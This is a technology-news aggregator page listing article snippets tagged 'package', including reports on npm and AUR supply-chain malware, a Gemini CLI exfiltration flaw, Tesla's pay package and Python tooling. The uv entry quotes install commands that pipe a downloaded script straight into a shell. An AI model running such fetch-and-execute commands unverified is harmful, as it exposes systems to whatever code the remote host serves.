Latest Tech News

Stay updated with the latest in technology, AI, cybersecurity, and more

Filtered by: package Clear Filter

Tesla hands $29B comp package to Elon Musk amid ‘AI talent war’

techcrunch.com Sean O'Kane 2025-12-10 18:13:55

Tesla’s board of directors has announced a new compensation package for CEO Elon Musk worth around $29 billion in shares, with the company citing the “ever-intensifying AI talent war and Tesla’s position at a critical inflection point” as reasons for the payout. The massive pay package is being allocated through a 2019 Equity Incentive Plan that is already approved by shareholders, so it won’t go to a vote, according to a regulatory filing and Ann Lipton, a professor at the University of Colora

Topics: company musk new package tesla
Read More
Shop Amazon

Tesla asks shareholders to approve $29B comp package for Elon Musk amid ‘AI talent war’

techcrunch.com Sean O'Kane 2025-12-11 12:13:55

Tesla’s board of directors has announced a proposed compensation package for CEO Elon Musk that would be worth around $29 billion in shares, with the company citing the “ever-intensifying AI talent war and Tesla’s position at a critical inflection point” as reasons for the payout. The new plan will be put to a vote at the company’s annual shareholder meeting, which is scheduled for November. It will also be entirely voided if the Delaware Supreme Court decides to overturn a judge’s January 2024

Topics: company musk new package tesla
Read More
Shop Amazon

Trump Ends Tariff Exemption for Small Packages

wired.com Zeyi Yang 2025-12-17 02:17:11

US President Donald Trump just dealt another blow to the embattled ecommerce industry, which is still reeling from sweeping tariffs Trump announced in the spring. On Wednesday, Trump signed an executive order widening the impact of those tariffs and making it more expensive for Americans to buy foreign products on sites like eBay, Etsy, and Amazon. The order eliminates the so-called “de minimis” provision, a long-standing policy that allowed people in the US to import packages valued at less th

Topics: minimis packages shipments tariffs trump
Read More
Shop Amazon

Flaw in Gemini CLI coding tool could allow hackers to run nasty commands

arstechnica.com Unknown 2025-12-17 23:30:43

Researchers needed less than 48 hours with Google’s new Gemini CLI coding agent to devise an exploit that made a default configuration of the tool surreptitiously exfiltrate sensitive data to an attacker-controlled server. Gemini CLI is a free, open-source AI tool that works in the terminal environment to help developers write code. It plugs into Gemini 2.5 Pro, Google’s most advanced model for coding and simulated reasoning. Gemini CLI is similar to Gemini Code Assist except that it creates or

Topics: cli code coding gemini package
Read More
Shop Amazon

Supply-chain attacks on open source software are getting out of hand

arstechnica.com Unknown 2025-12-26 05:50:37

It has been a busy week for supply-chain attacks targeting open source software available in public repositories, with successful breaches of multiple developer accounts that resulted in malicious packages being pushed to unsuspecting users. The latest target, according to security firm Socket, is JavaScript code available on repository npm. A total of 10 packages available from the npm page belonging to global talent agency Toptal contained malware and were downloaded by roughly 5,000 users be

Topics: attack github npm packages publishing
Read More
Shop Amazon

Open source repositories are seeing a rash of supply-chain attacks

arstechnica.com Unknown 2025-12-26 11:50:37

It has been a busy week for supply-chain attacks targeting open source software available in public repositories, with successful breaches of multiple developer accounts that resulted in malicious packages being pushed to unsuspecting users. The latest target, according to security firm Socket, is JavaScript code available on repository npm. A total of 10 packages available from the npm page belonging to global talent agency Toptal contained malware and were downloaded by roughly 5,000 users be

Topics: attack github npm packages socket
Read More
Shop Amazon

Hackers breach Toptal GitHub account, publish malicious npm packages

bleepingcomputer.com Unknown 2025-12-29 16:26:04

Hackers compromised Toptal's GitHub organization account and used their access to publish ten malicious packages on the Node Package Manager (NPM) index. The packages included data-stealing code that collected GitHub authentication tokens and then wiped the victims' systems. Toptal is a freelance talent marketplace that connects companies with software developers, designers, and finance experts. The company also maintains internal developer tools and design systems, most notably Picasso, which

Topics: github malicious packages picasso toptal
Read More
Shop Amazon

NPM package ‘is’ with 2.8M weekly downloads infected devs with malware

bleepingcomputer.com Unknown 2026-01-01 02:57:06

The popular NPM package 'is' has been compromised in a supply chain attack that injected backdoor malware, giving attackers full access to compromised devices. This occurred after maintainer accounts were hijacked via phishing, followed by unauthorized owner changes that went unnoticed for several hours, potentially compromising many developers who downloaded the new releases. The 'is' package is a lightweight JavaScript utility library that provides a wide variety of type checking and value v

Topics: attack compromised malware npm package
Read More
Shop Amazon

npm 'accidentally' removes Stylus package, breaks builds and pipelines

bleepingcomputer.com Unknown 2026-01-01 11:21:25

npm has taken down all versions of the real Stylus library and replaced them with a "security holding" page, breaking pipelines and builds worldwide that rely on the package. A security placeholder webpage is typically displayed when malicious packages and libraries are removed by the admins of npmjs.com, the world's largest software registry primarily used for JavaScript and Node.js development. But that isn't quite the case for Stylus: a legitimate "revolutionary" library receiving 3 million

Topics: npm npmjs package packages stylus
Read More
Shop Amazon

OSS Rebuild: open-source, rebuilt to last

news.ycombinator.com Posted Matthew Suozzo 2026-01-02 18:53:46

Today we're excited to announce OSS Rebuild, a new project to strengthen trust in open source package ecosystems by reproducing upstream artifacts. As supply chain attacks continue to target widely-used dependencies, OSS Rebuild gives security teams powerful data to avoid compromise without burden on upstream maintainers. The project comprises: Automation to derive declarative build definitions for existing PyPI (Python), npm (JS/TS), and Crates.io (Rust) packages. SLSA Provenance for thousan

Topics: build oss packages rebuild security
Read More
Shop Amazon

OSS Rebuild: open-source, Rebuilt to Last

news.ycombinator.com Posted Matthew Suozzo 2026-01-04 00:53:46

Today we're excited to announce OSS Rebuild, a new project to strengthen trust in open source package ecosystems by reproducing upstream artifacts. As supply chain attacks continue to target widely-used dependencies, OSS Rebuild gives security teams powerful data to avoid compromise without burden on upstream maintainers. The project comprises: Automation to derive declarative build definitions for existing PyPI (Python), npm (JS/TS), and Crates.io (Rust) packages. SLSA Provenance for thousan

Topics: build oss packages rebuild security
Read More
Shop Amazon

Installing apps on Linux? 4 ways it's different than any other OS - and mistakes to avoid

zdnet.com Jack Wallen 2026-01-07 02:26:28

Elyse Betters Picaro / ZDNET When I first started using Linux in the late 90s, there was really only one way to install an application. You would download the app, unpack the archive, run the ./configure command, build the app with make, and then install it with make install. Inevitably, when you ran through that course, you would stumble because of dependencies and have to locate the dependency, run through the same process as you just did (only with the new software), and then find out the ne

Topics: app install linux package software
Read More
Shop Amazon

Debcraft – Easiest way to modify and build Debian packages

news.ycombinator.com Unknown 2026-01-07 06:04:31

Debian packaging is notoriously hard. Far too many new contributors give up while trying, and many long-time contributors leave due to burnout from having to do too many thankless maintenance tasks. Some just skip testing their changes properly because it feels like too much toil. Debcraft is my attempt to solve this by automating all the boring stuff, and making it easier to learn the correct practices and helping new and old packagers better track changes in both source code and build artifac

Topics: build debcraft debian package packaging
Read More
Shop Amazon

Arch Linux pulls AUR packages that installed Chaos RAT malware

bleepingcomputer.com Unknown 2026-01-07 21:12:39

Arch Linux has pulled three malicious packages uploaded to the Arch User Repository (AUR) were used to install the CHAOS remote access trojan (RAT) on Linux devices. The packages were named "librewolf-fix-bin", "firefox-patch-bin", and "zen-browser-patched-bin," and were uploaded by the same user, "danikpapas," on July 16. The packages were removed two days later by the Arch Linux team after being flagged as malicious by the community. "On the 16th of July, at around 8pm UTC+2, a malicious AU

Topics: arch aur linux packages repository
Read More
Shop Amazon

Firefox-patch-bin, librewolf-fix-bin AUR packages contain malware

news.ycombinator.com Unknown 2026-01-08 16:48:48

On the 16th of July, at around 8pm UTC+2, a malicious AUR package was uploaded to the AUR. Two other malicious packages were uploaded by the same user a few hours later. These packages were installing a script coming from the same GitHub repository that was identified as a Remote Access Trojan (RAT). The affected malicious packages are: - librewolf-fix-bin - firefox-patch-bin - zen-browser-patched-bin The Arch Linux team addressed the issue as soon as they became aware of the situation. As of to

Topics: aur bin malicious packages uploaded
Read More
Shop Amazon

North Korean XORIndex malware hidden in 67 malicious npm packages

bleepingcomputer.com Unknown 2026-01-17 02:47:09

North Korean threat actors planted 67 malicious packages in the Node Package Manager (npm) online repository to deliver a new malware loader called XORIndex to developer systems. The packages collectively count more than 17,000 downloads and were discovered by researchers at package security platform Socket, who assess them to be part of the continued Contagious Interview operation. Socket researchers say that the campaign follows threat activity detected since April. Last month, the same acto

Topics: loader malware npm packages researchers
Read More
Shop Amazon

Solving Wordle with uv's dependency resolver

news.ycombinator.com Unknown 2026-01-31 21:28:30

Introduction In a previous life, I wrote a Sudoku solver that relied on Poetry's dependency resolver. We ended up selling that startup to EDB (not because of the Poetry hack), which means that they now own this IP. And, since then, Python packaging has advanced, with uv taking the world by storm. This means that it's time for a refresh. Can we use uv instead of Poetry? And can we solve a Wordle instead of a Sudoku? For the impatient: you can get the solver from my GitHub. Run uv run main.py r

Topics: letter package packages position version
Read More
Shop Amazon

Got a suspicious UPS text? Don't reply - it might be a scam. Here's how to tell

zdnet.com Lance Whitney 2026-02-13 21:13:00

Elyse Betters Picaro / ZDNET I've been anxiously expecting a package from UPS. That's why a text I received the other day caught my eye. Claiming to be from UPS, the message said that the carrier attempted to deliver the package on June 27, but the delivery couldn't be completed. The date was one when my wife and I were away, so this seemed legitimate at first glance. Also: Got a suspicious E-ZPass text? Don't click the link (and what to do if you already did) However, I've written plenty of

Topics: message package scams text ups
Read More
Shop Amazon

Ubuntu: Introducing Debcrafters

news.ycombinator.com Unknown 2026-02-16 04:42:43

Earlier this year, Canonical’s Ubuntu Engineering organisation gained a new team, seeded with some of our most prolific contributors to Ubuntu. Debcrafters is a new team dedicated to the maintenance of the Ubuntu Archive. The team’s primary goal is to maintain the health of the Ubuntu Archive, but its unique construction aims to attract a broad range of Linux distribution expertise; contributors to distributions like Debian, Arch Linux, NixOS and others are encouraged to join the team, and will

Topics: archive debcrafters packages team ubuntu
Read More
Shop Amazon

Why Go Rocks for Building a Lua Interpreter

news.ycombinator.com Roxy Light 2026-02-13 04:28:01

By Roxy Light I recently needed to build a custom Lua interpreter in Go. The exact reasons aren’t important for this blog post, but neither the reference implementation — which I will be referring to as “C Lua” throughout this article — nor the other open source Go Lua intepreters I could find were a good fit for my needs. Building a Lua interpreter ended up being a rather enjoyable months-long side quest. I’ve had a number of folks ask me to write about the experience since these sorts of proj

Topics: interpreter lua package type value
Read More
Shop Amazon

uv: An extremely fast Python package and project manager, written in Rust

news.ycombinator.com Unknown 2026-03-01 15:27:25

uv An extremely fast Python package and project manager, written in Rust. Installing Trio's dependencies with a warm cache. Highlights uv is backed by Astral, the creators of Ruff. Installation Install uv with our standalone installers: # On macOS and Linux. curl -LsSf https://astral.sh/uv/install.sh | sh # On Windows. powershell -ExecutionPolicy ByPass -c " irm https://astral.sh/uv/install.ps1 | iex " Or, from PyPI: # With pip. pip install uv # Or pipx. pipx install uv If installed

Topics: example install packages python uv
Read More
Shop Amazon
Trending Topics
Hot Now
ai 3634 apple 3004 new 2393 google 2022 content 1726
Popular
like 1493 company 1421 pro 1315 iphone 1151 app 1127 zdnet 1106 said 1060 data 1048 does 905 reviews 890
Emerging
editorial 869 amazon 857 game 808 samsung 775 phone 762 pixel 757 android 741 just 717 users 684 available 682
About GoKawiil

GoKawiil is a project by nerdhub.co that curates technology news from trusted sources. We built this site to provide a cleaner, more mobile-friendly experience without intrusive ads or heavy JavaScript.

Privacy

Your privacy matters. GoKawiil doesn't use Google Analytics or Facebook Pixel. The only tracking occurs through affiliate links to Amazon.

Advertising

Interested in advertising? Contact us at [email protected]